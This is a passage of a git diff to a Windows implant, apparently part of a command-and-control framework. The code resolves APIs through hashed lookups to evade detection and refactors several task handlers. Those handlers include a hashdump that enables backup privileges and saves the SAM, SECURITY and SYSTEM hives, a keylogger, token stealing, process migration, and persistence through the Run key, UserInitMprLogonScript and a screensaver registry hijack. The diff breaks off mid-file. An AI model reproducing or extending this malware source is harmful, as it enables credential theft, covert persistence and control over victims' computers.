Task::KeyLog(Utils::Convert::UTF8Decode(args["time"])); + wTaskResult = Task::KeyLog(pState, Utils::Convert::UTF8Decode(args["time"])); break; case TASK_KILL: wTaskResult = Task::Kill(pState); @@ -267,7 +267,7 @@ namespace Handler ); break; case TASK_NET: - wTaskResult = Task::Net(); + wTaskResult = Task::Net(pState); break; case TASK_PE: wTaskResult = Task::Pe( @@ -308,7 +308,7 @@ namespace Handler wTaskResult = Task::Rm(pState, Utils::Convert::UTF8Decode(args["path"])); break; case TASK_RMDIR: - wTaskResult = Task::Rmdir(Utils::Convert::UTF8Decode(args["path"])); + wTaskResult = Task::Rmdir(pState, Utils::Convert::UTF8Decode(args["path"])); break; case TASK_RPORTFWD_ADD: wTaskResult = Task::RportfwdAdd( @@ -353,7 +353,7 @@ namespace Handler wTaskResult = Task::SleepSet(pState, Utils::Convert::UTF8Decode(args["time"])); break; case TASK_TOKEN_REVERT: - wTaskResult = Task::TokenRevert(); + wTaskResult = Task::TokenRevert(pState); break; case TASK_TOKEN_STEAL: wTaskResult = Task::TokenSteal( diff --git a/payload/win/implant/src/core/procs.cpp b/payload/win/implant/src/core/procs.cpp index 2835ec4..c22d32e 100644 --- a/payload/win/implant/src/core/procs.cpp +++ b/payload/win/implant/src/core/procs.cpp @@ -251,18 +251,26 @@ namespace Procs pProcs->lpCreatePipe = reinterpret_cast(pCreatePipe); PVOID pCreateProcessW = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_CREATEPROCESSW); pProcs->lpCreateProcessW = reinterpret_cast(pCreateProcessW); + PVOID pCreateProcessWithLogonW = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_CREATEPROCESSWITHLOGONW); + pProcs->lpCreateProcessWithLogonW = reinterpret_cast(pCreateProcessWithLogonW); PVOID pCreateRemoteThreadEx = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_CREATEREMOTETHREADEX); pProcs->lpCreateRemoteThreadEx = reinterpret_cast(pCreateRemoteThreadEx); - PVOID pGetComputerNameW = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_GETCOMPUTERNAMEW); - pProcs->lpGetComputerNameW = reinterpret_cast(pGetComputerNameW); + PVOID pDeleteFileW = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_DELETEFILEW); + pProcs->lpDeleteFileW = reinterpret_cast(pDeleteFileW); PVOID pExpandEnvironmentStringsW = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_EXPANDENVIRONMENTSTRINGSW); pProcs->lpExpandEnvironmentStringsW = reinterpret_cast(pExpandEnvironmentStringsW); PVOID pFreeEnvironmentStringsW = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_FREEENVIRONMENTSTRINGSW); pProcs->lpFreeEnvironmentStringsW = reinterpret_cast(pFreeEnvironmentStringsW); + PVOID pFindClose = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_FINDCLOSE); + pProcs->lpFindClose = reinterpret_cast(pFindClose); PVOID pFindFirstFileW = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_FINDFIRSTFILEW); pProcs->lpFindFirstFileW = reinterpret_cast(pFindFirstFileW); PVOID pFindNextFileW = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_FINDNEXTFILEW); pProcs->lpFindNextFileW = reinterpret_cast(pFindNextFileW); + PVOID pFormatMessage = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_FORMATMESSAGE); + pProcs->lpFormatMessage = reinterpret_cast(pFormatMessage); + PVOID pGetComputerNameW = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_GETCOMPUTERNAMEW); + pProcs->lpGetComputerNameW = reinterpret_cast(pGetComputerNameW); PVOID pGetEnvironmentStringsW = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_GETENVIRONMENTSTRINGSW); pProcs->lpGetEnvironmentStringsW = reinterpret_cast(pGetEnvironmentStringsW); PVOID pGetLastError = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_GETLASTERROR); @@ -271,8 +279,14 @@ namespace Procs pProcs->lpGetModuleFileNameW = reinterpret_cast(pGetModuleFileNameW); PVOID pGetProcessHeap = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_GETPROCESSHEAP); pProcs->lpGetProcessHeap = reinterpret_cast(pGetProcessHeap); + PVOID pGetProcessImageFileNameW = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_GETPROCESSIMAGEFILENAMEW); + pProcs->lpGetProcessImageFileNameW = reinterpret_cast(pGetProcessImageFileNameW); PVOID pGetSystemDirectoryW = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_GETSYSTEMDIRECTORYW); pProcs->lpGetSystemDirectoryW = reinterpret_cast(pGetSystemDirectoryW); + PVOID pGlobalAlloc = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_GLOBALALLOC); + pProcs->lpGlobalAlloc = reinterpret_cast(pGlobalAlloc); + PVOID pGlobalFree = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_GLOBALFREE); + pProcs->lpGlobalFree = reinterpret_cast(pGlobalFree); PVOID pHeapAlloc = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_HEAPALLOC); pProcs->lpHeapAlloc = reinterpret_cast(pHeapAlloc); PVOID pHeapFree = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_HEAPFREE); @@ -281,18 +295,22 @@ namespace Procs pProcs->lpLoadLibraryA = reinterpret_cast(pLoadLibraryA); PVOID pLoadLibraryW = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_LOADLIBRARYW); pProcs->lpLoadLibraryW = reinterpret_cast(pLoadLibraryW); + PVOID pLocalFree = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_LOCALFREE); + pProcs->lpLocalFree = reinterpret_cast(pLocalFree); PVOID pIsDebuggerPresent = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_ISDEBUGGERPRESENT); pProcs->lpIsDebuggerPresent = reinterpret_cast(pIsDebuggerPresent); + PVOID pMoveFileW = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_MOVEFILEW); + pProcs->lpMoveFileW = reinterpret_cast(pMoveFileW); PVOID pOpenProcess = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_OPENPROCESS); pProcs->lpOpenProcess = reinterpret_cast(pOpenProcess); - PVOID pOpenProcessToken = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_OPENPROCESSTOKEN); - pProcs->lpOpenProcessToken = reinterpret_cast(pOpenProcessToken); PVOID pQueryFullProcessImageNameW = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_QUERYFULLPROCESSIMAGENAMEW); pProcs->lpQueryFullProcessImageNameW = reinterpret_cast(pQueryFullProcessImageNameW); PVOID pReadFile = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_READFILE); pProcs->lpReadFile = reinterpret_cast(pReadFile); PVOID pReadProcessMemory = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_READPROCESSMEMORY); pProcs->lpReadProcessMemory = reinterpret_cast(pReadProcessMemory); + PVOID pRemoveDirectoryW = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_REMOVEDIRECTORYW); + pProcs->lpRemoveDirectoryW = reinterpret_cast(pRemoveDirectoryW); PVOID pRtlCopyMemory = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_RTLCOPYMEMORY); pProcs->lpRtlCopyMemory = reinterpret_cast(pRtlCopyMemory); PVOID pSetFileInformationByHandle = GetProcAddressByHash(hKernel32DLL, HASH_FUNC_SETFILEINFORMATIONBYHANDLE); @@ -362,26 +380,52 @@ namespace Procs HMODULE hAdvapi32DLL, HMODULE hBcryptDLL, HMODULE hCrypt32DLL, + HMODULE hDbghelpDLL, + HMODULE hIphlpapiDLL, HMODULE hNetapi32DLL, + HMODULE hShell32DLL, + HMODULE hUser32DLL, HMODULE hWinHTTPDLL ) { // Advapi32 - PVOID pGetUserNameW = GetProcAddressByHash(hAdvapi32DLL, HASH_FUNC_GETUSERNAMEW); - pProcs->lpGetUserNameW = reinterpret_cast(pGetUserNameW); PVOID pAdjustTokenPrivileges = GetProcAddressByHash(hAdvapi32DLL, HASH_FUNC_ADJUSTTOKENPRIVILEGES); pProcs->lpAdjustTokenPrivileges = reinterpret_cast(pAdjustTokenPrivileges); + PVOID pCreateProcessWithTokenW = GetProcAddressByHash(hAdvapi32DLL, HASH_FUNC_CREATEPROCESSWITHTOKENW); + pProcs->lpCreateProcessWithTokenW = reinterpret_cast(pCreateProcessWithTokenW); + PVOID pDuplicateTokenEx = GetProcAddressByHash(hAdvapi32DLL, HASH_FUNC_DUPLICATETOKENEX); + pProcs->lpDuplicateTokenEx = reinterpret_cast(pDuplicateTokenEx); + PVOID pGetTokenInformation = GetProcAddressByHash(hAdvapi32DLL, HASH_FUNC_GETTOKENINFORMATION); + pProcs->lpGetTokenInformation = reinterpret_cast(pGetTokenInformation); + PVOID pGetUserNameW = GetProcAddressByHash(hAdvapi32DLL, HASH_FUNC_GETUSERNAMEW); + pProcs->lpGetUserNameW = reinterpret_cast(pGetUserNameW); + PVOID pImpersonateLoggedOnUser = GetProcAddressByHash(hAdvapi32DLL, HASH_FUNC_IMPERSONATELOGGEDONUSER); + pProcs->lpImpersonateLoggedOnUser = reinterpret_cast(pImpersonateLoggedOnUser); + PVOID pLookupPrivilegeNameW = GetProcAddressByHash(hAdvapi32DLL, HASH_FUNC_LOOKUPPRIVILEGENAMEW); + pProcs->lpLookupPrivilegeNameW = reinterpret_cast(pLookupPrivilegeNameW); PVOID pLookupPrivilegeValueW = GetProcAddressByHash(hAdvapi32DLL, HASH_FUNC_LOOKUPPRIVILEGEVALUEW); pProcs->lpLookupPrivilegeValueW = reinterpret_cast(pLookupPrivilegeValueW); + PVOID pOpenProcessToken = GetProcAddressByHash(hAdvapi32DLL, HASH_FUNC_OPENPROCESSTOKEN); + pProcs->lpOpenProcessToken = reinterpret_cast(pOpenProcessToken); PVOID pPrivilegeCheck = GetProcAddressByHash(hAdvapi32DLL, HASH_FUNC_PRIVILEGECHECK); pProcs->lpPrivilegeCheck = reinterpret_cast(pPrivilegeCheck); PVOID pRegCloseKey = GetProcAddressByHash(hAdvapi32DLL, HASH_FUNC_REGCLOSEKEY); pProcs->lpRegCloseKey = reinterpret_cast(pRegCloseKey); + PVOID pRegCreateKeyExW = GetProcAddressByHash(hAdvapi32DLL, HASH_FUNC_REGCREATEKEYEXW); + pProcs->lpRegCreateKeyExW = reinterpret_cast(pRegCreateKeyExW); PVOID pRegEnumKeyExW = GetProcAddressByHash(hAdvapi32DLL, HASH_FUNC_REGENUMKEYEXW); pProcs->lpRegEnumKeyExW = reinterpret_cast(pRegEnumKeyExW); + PVOID pRegEnumValueW = GetProcAddressByHash(hAdvapi32DLL, HASH_FUNC_REGENUMVALUEW); + pProcs->lpRegEnumValueW = reinterpret_cast(pRegEnumValueW); PVOID pRegOpenKeyExW = GetProcAddressByHash(hAdvapi32DLL, HASH_FUNC_REGOPENKEYEXW); pProcs->lpRegOpenKeyExW = reinterpret_cast(pRegOpenKeyExW); PVOID pRegQueryInfoKeyW = GetProcAddressByHash(hAdvapi32DLL, HASH_FUNC_REGQUERYINFOKEYW); pProcs->lpRegQueryInfoKeyW = reinterpret_cast(pRegQueryInfoKeyW); + PVOID pRegSaveKeyW = GetProcAddressByHash(hAdvapi32DLL, HASH_FUNC_REGSAVEKEYW); + pProcs->lpRegSaveKeyW = reinterpret_cast(pRegSaveKeyW); + PVOID pRegSetValueExW = GetProcAddressByHash(hAdvapi32DLL, HASH_FUNC_REGSETVALUEEXW); + pProcs->lpRegSetValueExW = reinterpret_cast(pRegSetValueExW); + PVOID pRevertToSelf = GetProcAddressByHash(hAdvapi32DLL, HASH_FUNC_REVERTTOSELF); + pProcs->lpRevertToSelf = reinterpret_cast(pRevertToSelf); // Bcrypt PVOID pBCryptCloseAlgorithmProvider = GetProcAddressByHash(hBcryptDLL, HASH_FUNC_BCRYPTCLOSEALGORITHMPROVIDER); @@ -407,6 +451,16 @@ namespace Procs PVOID pCryptStringToBinaryW = GetProcAddressByHash(hCrypt32DLL, HASH_FUNC_CRYPTSTRINGTOBINARYW); pProcs->lpCryptStringToBinaryW = reinterpret_cast(pCryptStringToBinaryW); + // Dbghelp + PVOID pMiniDumpWriteDump = GetProcAddressByHash(hDbghelpDLL, HASH_FUNC_MINIDUMPWRITEDUMP); + pProcs->lpMiniDumpWriteDump = reinterpret_cast(pMiniDumpWriteDump); + + // Iphlpapi + PVOID pGetAdaptersAddresses = GetProcAddressByHash(hIphlpapiDLL, HASH_FUNC_GETADAPTERSADDRESSES); + pProcs->lpGetAdaptersAddresses = reinterpret_cast(pGetAdaptersAddresses); + PVOID pGetTcpTable = GetProcAddressByHash(hIphlpapiDLL, HASH_FUNC_GETTCPTABLE); + pProcs->lpGetTcpTable = reinterpret_cast(pGetTcpTable); + // Netapi32 PVOID pNetApiBufferFree = GetProcAddressByHash(hNetapi32DLL, HASH_FUNC_NETAPIBUFFERFREE); pProcs->lpNetApiBufferFree = reinterpret_cast(pNetApiBufferFree); @@ -415,6 +469,38 @@ namespace Procs PVOID pNetUserEnum = GetProcAddressByHash(hNetapi32DLL, HASH_FUNC_NETUSERENUM); pProcs->lpNetUserEnum = reinterpret_cast(pNetUserEnum); + // Shell32 + PVOID pShellExecuteExW = GetProcAddressByHash(hShell32DLL, HASH_FUNC_SHELLEXECUTEEXW); + pProcs->lpShellExecuteExW = reinterpret_cast(pShellExecuteExW); + + // User32 + PVOID pCreateWindowExW = GetProcAddressByHash(hUser32DLL, HASH_FUNC_CREATEWINDOWEXW); + pProcs->lpCreateWindowExW = reinterpret_cast(pCreateWindowExW); + // PVOID pDispatchMessage = GetProcAddressByHash(hUser32DLL, HASH_FUNC_DISPATCHMESSAGE); + // pProcs->lpDispatchMessage = reinterpret_cast(pDispatchMessage); + PVOID pGetForegroundWindow = GetProcAddressByHash(hUser32DLL, HASH_FUNC_GETFOREGROUNDWINDOW); + pProcs->lpGetForegroundWindow = reinterpret_cast(pGetForegroundWindow); + // PVOID pGetMessage = GetProcAddressByHash(hUser32DLL, HASH_FUNC_GETMESSAGE); + // pProcs->lpGetMessage = reinterpret_cast(pGetMessage); + PVOID pGetSystemMetrics = GetProcAddressByHash(hUser32DLL, HASH_FUNC_GETSYSTEMMETRICS); + pProcs->lpGetSystemMetrics = reinterpret_cast(pGetSystemMetrics); + PVOID pLoadAcceleratorsW = GetProcAddressByHash(hUser32DLL, HASH_FUNC_LOADACCELERATORSW); + pProcs->lpLoadAcceleratorsW = reinterpret_cast(pLoadAcceleratorsW); + PVOID pLoadCursorW = GetProcAddressByHash(hUser32DLL, HASH_FUNC_LOADCURSORW); + pProcs->lpLoadCursorW = reinterpret_cast(pLoadCursorW); + PVOID pLoadIconW = GetProcAddressByHash(hUser32DLL, HASH_FUNC_LOADICONW); + pProcs->lpLoadIconW = reinterpret_cast(pLoadIconW); + PVOID pRegisterClassExW = GetProcAddressByHash(hUser32DLL, HASH_FUNC_REGISTERCLASSEXW); + pProcs->lpRegisterClassExW = reinterpret_cast(pRegisterClassExW); + PVOID pShowWindow = GetProcAddressByHash(hUser32DLL, HASH_FUNC_SHOWWINDOW); + pProcs->lpShowWindow = reinterpret_cast(pShowWindow); + PVOID pTranslateAcceleratorW = GetProcAddressByHash(hUser32DLL, HASH_FUNC_TRANSLATEACCELERATORW); + pProcs->lpTranslateAcceleratorW = reinterpret_cast(pTranslateAcceleratorW); + PVOID pTranslateMessage = GetProcAddressByHash(hUser32DLL, HASH_FUNC_TRANSLATEMESSAGE); + pProcs->lpTranslateMessage = reinterpret_cast(pTranslateMessage); + PVOID pUpdateWindow = GetProcAddressByHash(hUser32DLL, HASH_FUNC_UPDATEWINDOW); + pProcs->lpUpdateWindow = reinterpret_cast(pUpdateWindow); + // WinHttp PVOID pWinHttpCloseHandle = GetProcAddressByHash(hWinHTTPDLL, HASH_FUNC_WINHTTPCLOSEHANDLE); pProcs->lpWinHttpCloseHandle = reinterpret_cast(pWinHttpCloseHandle); @@ -437,6 +523,6 @@ namespace Procs PVOID pWinHttpSetOption = GetProcAddressByHash(hWinHTTPDLL, HASH_FUNC_WINHTTPSETOPTION); pProcs->lpWinHttpSetOption = reinterpret_cast(pWinHttpSetOption); PVOID pWinHttpWriteData = GetProcAddressByHash(hWinHTTPDLL, HASH_FUNC_WINHTTPWRITEDATA); - pProcs->lpWinHttpWriteData = reinterpret_cast(pWinHttpWriteData); + pProcs->lpWinHttpWriteData = reinterpret_cast(pWinHttpWriteData); } } diff --git a/payload/win/implant/src/core/state.cpp b/payload/win/implant/src/core/state.cpp index 5a91e4e..334dfb3 100644 --- a/payload/win/implant/src/core/state.cpp +++ b/payload/win/implant/src/core/state.cpp @@ -24,9 +24,13 @@ namespace State FreeLibrary(pState->hAdvapi32DLL); FreeLibrary(pState->hBcryptDLL); FreeLibrary(pState->hCrypt32DLL); + FreeLibrary(pState->hDbghelpDLL); + FreeLibrary(pState->hIphlpapiDLL); FreeLibrary(pState->hKernel32DLL); FreeLibrary(pState->hNetapi32DLL); FreeLibrary(pState->hNTDLL); + FreeLibrary(pState->hShell32DLL); + FreeLibrary(pState->hUser32DLL); FreeLibrary(pState->hWinHTTPDLL); delete pState->pCrypt->pAES; diff --git a/payload/win/implant/src/core/task/find.cpp b/payload/win/implant/src/core/task/find.cpp index 2332781..8e116c2 100644 --- a/payload/win/implant/src/core/task/find.cpp +++ b/payload/win/implant/src/core/task/find.cpp @@ -29,7 +29,7 @@ namespace Task // Find the first file in the directory. WIN32_FIND_DATAW ffd; - HANDLE hFind = FindFirstFileW(wDirAbsPathExtended.c_str(), &ffd); + HANDLE hFind = pState->pProcs->lpFindFirstFileW(wDirAbsPathExtended.c_str(), &ffd); if (hFind == INVALID_HANDLE_VALUE) { return L""; @@ -62,9 +62,9 @@ namespace Task wResult += wPath + L"\\" + std::wstring(ffd.cFileName); wResult += std::wstring(L"\n"); } - } while (FindNextFileW(hFind, &ffd) != 0); + } while (pState->pProcs->lpFindNextFileW(hFind, &ffd) != 0); - FindClose(hFind); + pState->pProcs->lpFindClose(hFind); return wResult; } } diff --git a/payload/win/implant/src/core/task/hashdump.cpp b/payload/win/implant/src/core/task/hashdump.cpp index 51d75f4..6ed589b 100644 --- a/payload/win/implant/src/core/task/hashdump.cpp +++ b/payload/win/implant/src/core/task/hashdump.cpp @@ -4,27 +4,30 @@ namespace Task { namespace Helper::Hashdump { - BOOL SaveRegHive(const std::wstring& wHiveKey, const std::wstring& wSavePath) - { + BOOL SaveRegHive( + Procs::PPROCS pProcs, + const std::wstring& wHiveKey, + const std::wstring& wSavePath + ) { HKEY hKey; - LONG result = RegOpenKeyExW(HKEY_LOCAL_MACHINE, wHiveKey.c_str(), 0, KEY_READ, &hKey); + LONG result = pProcs->lpRegOpenKeyExW(HKEY_LOCAL_MACHINE, wHiveKey.c_str(), 0, KEY_READ, &hKey); if (result != ERROR_SUCCESS) { if (result == ERROR_ACCESS_DENIED) { - Stdout::DisplayMessageBoxA("ERROR_ACCESS_DENIED", "RegOpenKeyExW"); + // Stdout::DisplayMessageBoxA("ERROR_ACCESS_DENIED", "RegOpenKeyExW"); } return FALSE; } - result = RegSaveKeyW(hKey, wSavePath.c_str(), nullptr); + result = pProcs->lpRegSaveKeyW(hKey, wSavePath.c_str(), nullptr); if (result != ERROR_SUCCESS) { - RegCloseKey(hKey); + pProcs->lpRegCloseKey(hKey); return FALSE; } - RegCloseKey(hKey); + pProcs->lpRegCloseKey(hKey); return TRUE; } } @@ -33,8 +36,10 @@ namespace Task { // Enable privileges HANDLE hToken; - if (!OpenProcessToken(NtCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) - { + if (!pState->pProcs->lpOpenProcessToken( + NtCurrentProcess(), + TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken + )) { return L"Error: Failed to open token handle."; } if (!System::Priv::PrivilegeSet( @@ -43,7 +48,7 @@ namespace Task SE_BACKUP_NAME, TRUE )) { - CloseHandle(hToken); + pState->pProcs->lpCloseHandle(hToken); return L"Error: Failed to set SeBackupPrivilege."; } if (!System::Priv::PrivilegeSet( @@ -52,7 +57,7 @@ namespace Task SE_RESTORE_NAME, TRUE )) { - CloseHandle(hToken); + pState->pProcs->lpCloseHandle(hToken); return L"Error: Failed to set SeRestorePrivilege."; } @@ -64,15 +69,15 @@ namespace Task std::wstring wSystemPath = wTempPath + L"\\" + Utils::Random::RandomString(8); // Save registry hives. - if (!Helper::Hashdump::SaveRegHive(L"SAM", wSamPath)) + if (!Helper::Hashdump::SaveRegHive(pState->pProcs, L"SAM", wSamPath)) { return L"Error: Failed to save SAM."; } - if (!Helper::Hashdump::SaveRegHive(L"SECURITY", wSecurityPath)) + if (!Helper::Hashdump::SaveRegHive(pState->pProcs, L"SECURITY", wSecurityPath)) { return L"Error: Failed to save SECURITY."; } - if (!Helper::Hashdump::SaveRegHive(L"SYSTEM", wSystemPath)) + if (!Helper::Hashdump::SaveRegHive(pState->pProcs, L"SYSTEM", wSystemPath)) { return L"Error: Failed to save SYSTEM."; } diff --git a/payload/win/implant/src/core/task/ip.cpp b/payload/win/implant/src/core/task/ip.cpp index 73e29ff..d10486c 100644 --- a/payload/win/implant/src/core/task/ip.cpp +++ b/payload/win/implant/src/core/task/ip.cpp @@ -2,7 +2,7 @@ namespace Task { - std::wstring Ip() + std::wstring Ip(State::PSTATE pState) { std::wstring result; @@ -38,7 +38,13 @@ namespace Task return L"Error: Could not allocate memory for addresses"; } - dwRetVal = GetAdaptersAddresses(family, flags, NULL, (PIP_ADAPTER_ADDRESSES)pAddresses, &outBufLen); + dwRetVal = pState->pProcs->lpGetAdaptersAddresses( + family, + flags, + NULL, + (PIP_ADAPTER_ADDRESSES)pAddresses, + &outBufLen + ); if (dwRetVal == ERROR_BUFFER_OVERFLOW) { FREE(pAddresses); @@ -207,7 +213,7 @@ namespace Task } else { - if (FormatMessage( + if (pState->pProcs->lpFormatMessage( FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, NULL, dwRetVal, @@ -221,7 +227,7 @@ namespace Task result += L"Error: "; result += wlpMsgBuf; result += L"\n"; - LocalFree(lpMsgBuf); + pState->pProcs->lpLocalFree(lpMsgBuf); if (pAddresses) { FREE(pAddresses); diff --git a/payload/win/implant/src/core/task/keylog.cpp b/payload/win/implant/src/core/task/keylog.cpp index 8888582..4f76680 100644 --- a/payload/win/implant/src/core/task/keylog.cpp +++ b/payload/win/implant/src/core/task/keylog.cpp @@ -83,8 +83,11 @@ namespace Task::Helper::KeyLog } } - LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) - { + LRESULT CALLBACK KeyboardProc( + int nCode, + WPARAM wParam, + LPARAM lParam + ) { CHAR szBuf[128]; HDC hdc; static INT c = 0; @@ -108,7 +111,7 @@ namespace Task::Helper::KeyLog namespace Task { - std::wstring KeyLog(const std::wstring& wLogTime) + std::wstring KeyLog(State::PSTATE pState, const std::wstring& wLogTime) { INT nLogTime = std::stoi(wLogTime); @@ -121,7 +124,6 @@ namespace Task // Keep running 'nLogTime' seconds. MSG msg; std::chrono::time_point start = std::chrono::steady_clock::now(); - // while (GetMessage(&msg, NULL, 0, 0)) while (1==1) { PeekMessage(&msg, NULL, 0, 0, 0); diff --git a/payload/win/implant/src/core/task/ls.cpp b/payload/win/implant/src/core/task/ls.cpp index d66b5fe..57f1d33 100644 --- a/payload/win/implant/src/core/task/ls.cpp +++ b/payload/win/implant/src/core/task/ls.cpp @@ -24,7 +24,7 @@ namespace Task wDirAbsPathExtended += L"\\*"; // Find the first file in the directory. - hFind = FindFirstFileW(wDirAbsPathExtended.c_str(), &ffd); + hFind = pState->pProcs->lpFindFirstFileW(wDirAbsPathExtended.c_str(), &ffd); if (hFind == INVALID_HANDLE_VALUE) { return L"Error: Could not find the first file in the directory."; @@ -55,9 +55,9 @@ namespace Task result += wFilesize; result += std::wstring(L" bytes\n"); } - } while (FindNextFileW(hFind, &ffd) != 0); + } while (pState->pProcs->lpFindNextFileW(hFind, &ffd) != 0); - FindClose(hFind); + pState->pProcs->lpFindClose(hFind); return result; } } \ No newline at end of file diff --git a/payload/win/implant/src/core/task/migrate.cpp b/payload/win/implant/src/core/task/migrate.cpp index acfce0d..849aa35 100644 --- a/payload/win/implant/src/core/task/migrate.cpp +++ b/payload/win/implant/src/core/task/migrate.cpp @@ -14,7 +14,7 @@ namespace Task // Get the current process executable file name to migrate. WCHAR execName[MAX_PATH*4]; - DWORD dwFileLen = GetProcessImageFileNameW( + DWORD dwFileLen = pState->pProcs->lpGetProcessImageFileNameW( hCurrProcess, const_cast(execName), MAX_PATH*4 diff --git a/payload/win/implant/src/core/task/mv.cpp b/payload/win/implant/src/core/task/mv.cpp index 6bad57f..b82a79e 100644 --- a/payload/win/implant/src/core/task/mv.cpp +++ b/payload/win/implant/src/core/task/mv.cpp @@ -4,7 +4,7 @@ namespace Task { std::wstring Mv(State::PSTATE pState, const std::wstring& wSrc, const std::wstring& wDest) { - if (!MoveFileW(wSrc.c_str(), wDest.c_str())) + if (!pState->pProcs->lpMoveFileW(wSrc.c_str(), wDest.c_str())) // if (!System::Fs::FileMove(pState->pProcs, wSrc, wDest)) // Bug: the 'FileMove' function forcefully terminates the program. { return L"Error: Could not move a file."; diff --git a/payload/win/implant/src/core/task/net.cpp b/payload/win/implant/src/core/task/net.cpp index 4c81242..b2b5bdf 100644 --- a/payload/win/implant/src/core/task/net.cpp +++ b/payload/win/implant/src/core/task/net.cpp @@ -2,7 +2,7 @@ namespace Task { - std::wstring Net() + std::wstring Net(State::PSTATE pState) { std::wstring result = L""; @@ -26,7 +26,7 @@ namespace Task ulSize = sizeof(MIB_TCPTABLE); // Make an initial call to GetTcpTable to get the necessary size into the ulSize variable. - if ((dwRetVal = GetTcpTable(pTcpTable, &ulSize, TRUE)) == ERROR_INSUFFICIENT_BUFFER) + if ((dwRetVal = pState->pProcs->lpGetTcpTable(pTcpTable, &ulSize, TRUE)) == ERROR_INSUFFICIENT_BUFFER) { FREE(pTcpTable); pTcpTable = (MIB_TCPTABLE*)MALLOC(ulSize); @@ -36,7 +36,7 @@ namespace Task } } - if ((dwRetVal = GetTcpTable(pTcpTable, &ulSize, TRUE)) == NO_ERROR) + if ((dwRetVal = pState->pProcs->lpGetTcpTable(pTcpTable, &ulSize, TRUE)) == NO_ERROR) { std::wstring labelLocalAddr = L"LocalAddress"; std::wstring labelLocalPort = L"LocalPort"; diff --git a/payload/win/implant/src/core/task/persist.cpp b/payload/win/implant/src/core/task/persist.cpp index dbed261..5c79a19 100644 --- a/payload/win/implant/src/core/task/persist.cpp +++ b/payload/win/implant/src/core/task/persist.cpp @@ -6,7 +6,7 @@ namespace Task { // Get current program (implant) path. WCHAR wSelfPath[MAX_PATH]; - DWORD dwResult = GetModuleFileNameW(NULL, wSelfPath, MAX_PATH); + DWORD dwResult = pState->pProcs->lpGetModuleFileNameW(NULL, wSelfPath, MAX_PATH); if (dwResult == 0) { return L"Error: Failed to get the program path."; @@ -21,7 +21,7 @@ namespace Task std::wstring wSubKey = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run"; std::wstring wValue = Utils::Random::RandomString(8); - LONG result = RegOpenKeyExW( + LONG result = pState->pProcs->lpRegOpenKeyExW( HKEY_CURRENT_USER, wSubKey.c_str(), 0, @@ -33,7 +33,7 @@ namespace Task return L"Error: Failed to open key."; } - result = RegSetValueExW( + result = pState->pProcs->lpRegSetValueExW( hKey, wValue.c_str(), 0, @@ -41,7 +41,7 @@ namespace Task (BYTE*)lpSelfPath, (wcslen(lpSelfPath) + 1) * sizeof(WCHAR) ); - RegCloseKey(hKey); + pState->pProcs->lpRegCloseKey(hKey); if (result == ERROR_SUCCESS) { @@ -57,7 +57,7 @@ namespace Task HKEY hKey; std::wstring wSubKey = L"Environment"; - LONG result = RegOpenKeyExW( + LONG result = pState->pProcs->lpRegOpenKeyExW( HKEY_CURRENT_USER, wSubKey.c_str(), 0, @@ -69,7 +69,7 @@ namespace Task return L"Error: Failed to open key."; } - result = RegSetValueExW( + result = pState->pProcs->lpRegSetValueExW( hKey, L"UserInitMprLogonScript", 0, @@ -77,7 +77,7 @@ namespace Task (BYTE*)lpSelfPath, (wcslen(lpSelfPath) + 1) * sizeof(WCHAR) ); - RegCloseKey(hKey); + pState->pProcs->lpRegCloseKey(hKey); if (result == ERROR_SUCCESS) { @@ -96,7 +96,7 @@ namespace Task const WCHAR* wActivate = L"1"; // 1 => Activate const WCHAR* wTimeOut = L"10"; - if (RegOpenKeyExW( + if (pState->pProcs->lpRegOpenKeyExW( HKEY_CURRENT_USER, wSubKey.c_str(), 0, @@ -108,7 +108,7 @@ namespace Task } // Create new registry keys. - if (RegSetValueExW( + if (pState->pProcs->lpRegSetValueExW( hKey, L"ScreenSaveActive", 0, @@ -117,11 +117,11 @@ namespace Task (wcslen(wActivate) + 1) * sizeof(WCHAR) ) != ERROR_SUCCESS) { - RegCloseKey(hKey); + pState->pProcs->lpRegCloseKey(hKey); return L"Error: Failed to set value to registry."; } - if (RegSetValueExW( + if (pState->pProcs->lpRegSetValueExW( hKey, L"ScreenSaveTimeOut", 0, @@ -130,11 +130,11 @@ namespace Task (wcslen(wTimeOut) + 1) * sizeof(WCHAR) ) != ERROR_SUCCESS) { - RegCloseKey(hKey); + pState->pProcs->lpRegCloseKey(hKey); return L"Error: Failed to set value to registry."; } - if (RegSetValueExW( + if (pState->pProcs->lpRegSetValueExW( hKey, L"SCRNSAVE.EXE", 0, @@ -143,11 +143,11 @@ namespace Task 